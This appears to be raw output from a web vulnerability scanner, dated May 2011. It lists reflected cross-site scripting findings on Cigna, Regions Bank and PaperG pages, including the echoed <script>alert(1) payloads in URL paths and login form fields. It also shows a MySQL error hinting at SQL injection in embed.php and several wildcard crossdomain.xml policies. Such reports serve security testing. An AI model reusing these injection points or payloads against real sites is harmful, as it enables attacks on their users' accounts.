| GET /sites/toolkit/managers Host: cigna.com Proxy-Connection: keep-alive Referer: http://cigna.com/sites User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 404 Not found Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:31:37 GMT Content-type: text/html; charset=utf-8 Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content="text/html; ch ...[SNIP]... <b>/sites/toolkit ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Certain | 
| Host: | http://cigna.com | 
| Path: | /sites/toolkit/managers | 
| GET /sites/toolkit/managers Host: cigna.com Proxy-Connection: keep-alive Referer: http://cigna.com/sites User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 404 Not found Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:31:42 GMT Content-type: text/html; charset=utf-8 Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content="text/html; ch ...[SNIP]... <b>/sites/toolkit ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Certain | 
| Host: | http://cigna.com | 
| Path: | /sites/toolkit/managers | 
| GET /sites/toolkit/managers Host: cigna.com Proxy-Connection: keep-alive Referer: http://cigna.com/sites User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 404 Not found Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:31:52 GMT Content-type: text/html; charset=utf-8 Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content="text/html; ch ...[SNIP]... <b>/sites/toolkit ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Certain | 
| Host: | http://cigna.com | 
| Path: | /sites/toolkit/physicians | 
| GET /sitesc0f96<script>alert(1)< Host: cigna.com Proxy-Connection: keep-alive Referer: http://cigna.com/sites User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 404 Not found Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:35:09 GMT Content-type: text/html; charset=utf-8 Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content="text/html; ch ...[SNIP]... <b>/sitesc0f96<script>alert(1)< ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Certain | 
| Host: | http://cigna.com | 
| Path: | /sites/toolkit/physicians | 
| GET /sites/toolkit77fcd<script>alert(1)< Host: cigna.com Proxy-Connection: keep-alive Referer: http://cigna.com/sites User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 404 Not found Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:35:21 GMT Content-type: text/html; charset=utf-8 Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content="text/html; ch ...[SNIP]... <b>/sites/toolkit77fcd<script>alert(1)< ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Certain | 
| Host: | http://cigna.com | 
| Path: | /sites/toolkit/physicians | 
| GET /sites/toolkit/physicians Host: cigna.com Proxy-Connection: keep-alive Referer: http://cigna.com/sites User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 404 Not found Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:35:33 GMT Content-type: text/html; charset=utf-8 Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content="text/html; ch ...[SNIP]... <b>/sites/toolkit ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Certain | 
| Host: | http://cigna.com | 
| Path: | /sites/toolkit/physicians | 
| GET /sites/toolkit/physicians Host: cigna.com Proxy-Connection: keep-alive Referer: http://cigna.com/sites User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 404 Not found Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:35:48 GMT Content-type: text/html; charset=utf-8 Content-Length: 15812 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content="text/html; ch ...[SNIP]... <b>/sites/toolkit ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Certain | 
| Host: | http://cigna.com | 
| Path: | /sites/toolkit/physicians | 
| GET /sites/toolkit/physicians Host: cigna.com Proxy-Connection: keep-alive Referer: http://cigna.com/sites User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 404 Not found Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:36:04 GMT Content-type: text/html; charset=utf-8 Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content="text/html; ch ...[SNIP]... <b>/sites/toolkit ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Certain | 
| Host: | http://cigna.com | 
| Path: | /sites/toolkit/physicians | 
| GET /sites/toolkit/physicians Host: cigna.com Proxy-Connection: keep-alive Referer: http://cigna.com/sites User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 404 Not found Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:36:21 GMT Content-type: text/html; charset=utf-8 Content-Length: 15812 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content="text/html; ch ...[SNIP]... <b>/sites/toolkit ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Certain | 
| Host: | http://cigna.com | 
| Path: | /sites/toolkit/physicians | 
| GET /sitesc04c7<script>alert(1)< Host: cigna.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 404 Not found Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:31:24 GMT Content-type: text/html; charset=utf-8 Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content="text/html; ch ...[SNIP]... <b>/sitesc04c7<script>alert(1)< ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Certain | 
| Host: | http://cigna.com | 
| Path: | /sites/toolkit/physicians | 
| GET /sites/toolkitb9565<script>alert(1)< Host: cigna.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 404 Not found Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:31:30 GMT Content-type: text/html; charset=utf-8 Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content="text/html; ch ...[SNIP]... <b>/sites/toolkitb9565<script>alert(1)< ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Certain | 
| Host: | http://cigna.com | 
| Path: | /sites/toolkit/physicians | 
| GET /sites/toolkit/physicians Host: cigna.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 404 Not found Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:31:36 GMT Content-type: text/html; charset=utf-8 Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content="text/html; ch ...[SNIP]... <b>/sites/toolkit ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Certain | 
| Host: | http://cigna.com | 
| Path: | /sites/toolkit/physicians | 
| GET /sites/toolkit/physicians Host: cigna.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 404 Not found Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:31:42 GMT Content-type: text/html; charset=utf-8 Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content="text/html; ch ...[SNIP]... <b>/sites/toolkit ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Certain | 
| Host: | http://ol5u8o2ka38be | 
| Path: | /gadgets/ifr | 
| GET /gadgets/ifr?url=http:/ Host: ol5u8o2ka38be34j62kt Proxy-Connection: keep-alive Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* | 
| HTTP/1.1 400 Bad Request P3P: CP="CAO PSA OUR" Content-Type: text/html; charset=UTF-8 Date: Mon, 16 May 2011 14:32:50 GMT Expires: Mon, 16 May 2011 14:32:50 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Content-Length: 116 Unable to retrieve spec for http://fcgadgets.appspot alert(1)//83f1733c0b7. HTTP error 400 | 
| Severity: | High | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /OAO/DESGetFiles.aspx | 
| GET /OAO/DESGetFiles.aspx Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WT_FPC=id=2ac1f5713c | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Cache-Control: public Content-Type: text/javascript; charset=utf-8 Expires: Thu, 16 Jun 2011 05:00:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Date: Mon, 16 May 2011 15:21:34 GMT Content-Length: 259 // The files= parameter was tampered with. No files were returned./* Exception:Cannot convert [5447833<script>alert(1)< ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Certain | 
| Host: | https://sso.corp.cigna | 
| Path: | /corp/sso/professional | 
| GET /corp/sso/professional Host: sso.corp.cigna.com Connection: keep-alive Referer: https://sso.corp.cigna User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:31:26 GMT Content-type: text/html;charset=ISO Set-Cookie: TLTHID=906391387FD11 Content-language: en Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>CIGNAaccess.com - Forgotten Id - Enter User Information</title> <link rel="S ...[SNIP]... <input type="button" value="Cancel" onClick="JavaScript ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Certain | 
| Host: | https://sso.corp.cigna | 
| Path: | /corp/sso/professional | 
| POST /corp/sso/professional Host: sso.corp.cigna.com Connection: keep-alive Referer: https://sso.corp.cigna Cache-Control: max-age=0 Origin: https://sso.corp.cigna User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 Content-Length: 73 command=forgotidsrch&DOB= | 
| HTTP/1.1 200 OK Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:33:33 GMT Content-type: text/html;charset=ISO Set-Cookie: TLTHID=DC6799A87FD11 Content-language: en Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>CIGNAaccess.com - Forgotten Id - Enter User Information</title> <link rel="S ...[SNIP]... <input type="text" size="15" maxlength="25" name="fname" value="a1c3e"><script>alert(1)< ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Certain | 
| Host: | https://sso.corp.cigna | 
| Path: | /corp/sso/professional | 
| POST /corp/sso/professional Host: sso.corp.cigna.com Connection: keep-alive Referer: https://sso.corp.cigna Cache-Control: max-age=0 Origin: https://sso.corp.cigna User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 Content-Length: 73 command=forgotidsrch&DOB= | 
| HTTP/1.1 200 OK Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:33:40 GMT Content-type: text/html;charset=ISO Set-Cookie: TLTHID=E033B6027FD11 Content-language: en Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>CIGNAaccess.com - Forgotten Id - Enter User Information</title> <link rel="S ...[SNIP]... <input type="text" size="15" maxlength="25" name="lname" value="a7324"><script>alert(1)< ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /flyerboard/albany-times | 
| GET /flyerboard/albany-times Host: www.paperg.com Proxy-Connection: keep-alive Referer: http://www.paperg.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=27786045 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 14:49:13 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Connection: Keep-alive Via: 1.1 AN-0016020122637050 Content-Length: 5558 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> ...[SNIP]... <script type="text/javascript" src="/jsfb/embed.php?view ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /jsfb/embed.php | 
| GET /jsfb/embed.php?view=all Host: www.paperg.com Proxy-Connection: keep-alive Referer: http://www.paperg.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=27786045 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 14:49:40 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT P3P: CP="CAO PSA OUR" Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Connection: Keep-alive Via: 1.1 AN-0016020122637050 Content-Length: 48336 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'alert(1)//5cff8161487'' at line 1 var view_all_board = docume ...[SNIP]... PG_scriptParent = PG_scriptEl.parentNode; if(!board_id) var board_id=[]; if(!pub_id) var pub_id=[]; if(!widget_id) var widget_id=[]; board_id[15528b3b4';alert pub_id[15528b3b4';alert(1 widget_id[15528b3b4' var bid = 15528b3b4';alert(1)/ var pid = 891; var wid = 0; var objBody = document.get ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /jsfb/embed.php | 
| GET /jsfb/embed.php?view=all Host: www.paperg.com Proxy-Connection: keep-alive Referer: http://www.paperg.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=27786045 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 14:49:43 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT P3P: CP="CAO PSA OUR" Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Connection: Keep-alive Via: 1.1 AN-0016020122637050 Content-Length: 48140 var view_all_board = document.getElementById( if(view_all_board) view_all_board.style var IMAGE_ROOT = 'http://www.paperg.com var flyerboard_root = 'http://www.paperg.com var remote_ip = '173.193.214.243'; var view = ''; var edit = '0'; var EMBED_URL1552cabe8;alert(1)/ // links stylesheets in head function pg_linkss(filename) { var head = document.getElementsByT ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /jsfb/embed.php | 
| GET /jsfb/embed.php?view=all Host: www.paperg.com Proxy-Connection: keep-alive Referer: http://www.paperg.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=27786045 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 14:49:38 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT P3P: CP="CAO PSA OUR" Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Connection: Keep-alive Via: 1.1 AN-0016020122637050 Content-Length: 48159 var view_all_board = document.getElementById( if(view_all_board) view_all_board.style var IMAGE_ROOT = 'http://www.paperg.com var flyerboard_roo ...[SNIP]... PG_scriptParent = PG_scriptEl.parentNode; if(!board_id) var board_id=[]; if(!pub_id) var pub_id=[]; if(!widget_id) var widget_id=[]; board_id[15529cd06";alert pub_id[15529cd06";alert(1 widget_id[15529cd06" var bid = 15529cd06";alert(1)/ var pid = 891; var wid = 0; var objBody = document.get ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /jsfb/embed.php | 
| GET /jsfb/embed.php?view=all Host: www.paperg.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.paperg.com Cookie: PHPSESSID=shsfh547e8 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 16:01:25 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT P3P: CP="CAO PSA OUR" Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Connection: Keep-alive Via: 1.1 AN-0016020122637050 Content-Length: 47764 var view_all_board = document.getElementById( if(view_all_board) view_all_board.style var IMAGE_ROOT = 'http://www.paperg.com var flyerboard_roo ...[SNIP]... pt may not be the last element var PG_scriptEl = PG_scripts[ PG_scripts.length - 1 ]; if(PG_scriptEl.src != "http://www.paperg.com { var page_script = ''; var i = 0; for(i = 0; i < PG_scripts.length; i++) { page_script = PG_scripts[i]; if(page_script.src == "http://www.paperg.com ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /jsfb/embed.php | 
| GET /jsfb/embed.php?view=all Host: www.paperg.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.paperg.com Cookie: PHPSESSID=shsfh547e8 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 16:01:30 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT P3P: CP="CAO PSA OUR" Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Connection: Keep-alive Via: 1.1 AN-0016020122637050 Content-Length: 47761 var view_all_board = document.getElementById( if(view_all_board) view_all_board.style var IMAGE_ROOT = 'http://www.paperg.com var flyerboard_roo ...[SNIP]... ://www.paperg.com/jsfb/'; var remote_ip = '173.193.214.243'; var view = ''; var edit = '0'; var EMBED_URL1552 = 'http://www.paperg.com // links stylesheets in head function pg_linkss(filename) { var head = document.getElements link = document.createElement( link.rel = 'stylesheet'; link.media ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Certain | 
| Host: | http://ajax.googleapis | 
| Path: | /crossdomain.xml | 
| GET /crossdomain.xml HTTP/1.0 Host: ajax.googleapis.com | 
| HTTP/1.0 200 OK Expires: Tue, 17 May 2011 04:15:49 GMT Date: Mon, 16 May 2011 04:15:49 GMT Content-Type: text/x-cross-domain X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Cache-Control: public, max-age=86400 Age: 46337 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Certain | 
| Host: | http://statse.webtre | 
| Path: | /crossdomain.xml | 
| GET /crossdomain.xml HTTP/1.0 Host: statse.webtrendslive.com | 
| HTTP/1.1 200 OK Content-Length: 82 Content-Type: text/xml Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT Accept-Ranges: bytes ETag: "ef9fe45d4643c81:83e" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:20:04 GMT Connection: close <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> | 
| Severity: | High | 
| Confidence: | Certain | 
| Host: | https://www.paperg.com | 
| Path: | /crossdomain.xml | 
| GET /crossdomain.xml HTTP/1.0 Host: www.paperg.com | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 14:45:47 GMT Server: Apache Last-Modified: Wed, 09 Sep 2009 02:28:24 GMT ETag: "105-4731bd6544200" Accept-Ranges: bytes Content-Length: 261 Connection: close Content-Type: application/xml <?xml version="1.0" ?> <!-- http://www.paperg.com --> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> ...[SNIP]... <allow-access-from domain="*" /> ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Certain | 
| Host: | http://www.placelocal.com | 
| Path: | /crossdomain.xml | 
| GET /crossdomain.xml HTTP/1.0 Host: www.placelocal.com | 
| HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Mon, 16 May 2011 15:19:41 GMT Content-Type: application/xml Connection: close Last-Modified: Mon, 25 Oct 2010 19:42:00 GMT Accept-Ranges: bytes Content-Length: 328 Cache-Control: max-age=604800 Expires: Mon, 23 May 2011 15:19:41 GMT <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*" secure="false" /> ...[SNIP]... | 
| Severity: | Low | 
| Confidence: | Certain | 
| Host: | http://ads.bridgetrack | 
| Path: | /crossdomain.xml | 
| GET /crossdomain.xml HTTP/1.0 Host: ads.bridgetrack.com | 
| HTTP/1.1 200 OK Cache-Control: private Content-Length: 810 Content-Type: text/html Date: Mon, 16 May 2011 15:20:07 GMT Connection: close <?xml version="1.0"?> <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="ads.bridgetrack.com <allow-access-from domain="ads.bri ...[SNIP]... <allow-access-from domain="sec-ads.bridgetrack.com" /> <allow-access-from domain="cms-ads.bridgetrack.com" /> <allow-access-from domain="sec-cms-ads.bridgetrack <allow-access-from domain="travelerssaves.com" /> <allow-access-from domain="moneyneedsattention.com" /> <allow-access-from domain="www.moneyneedsattention <allow-access-from domain="portal.kaplan.edu" /> <allow-access-from domain="www.portal.kaplan.edu"/> <allow-access-from domain="*.spongecell.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.myvolvo.com.au" secure="false" /> ...[SNIP]... | 
| Severity: | Low | 
| Confidence: | Certain | 
| Host: | http://feeds.bbci.co.uk | 
| Path: | /crossdomain.xml | 
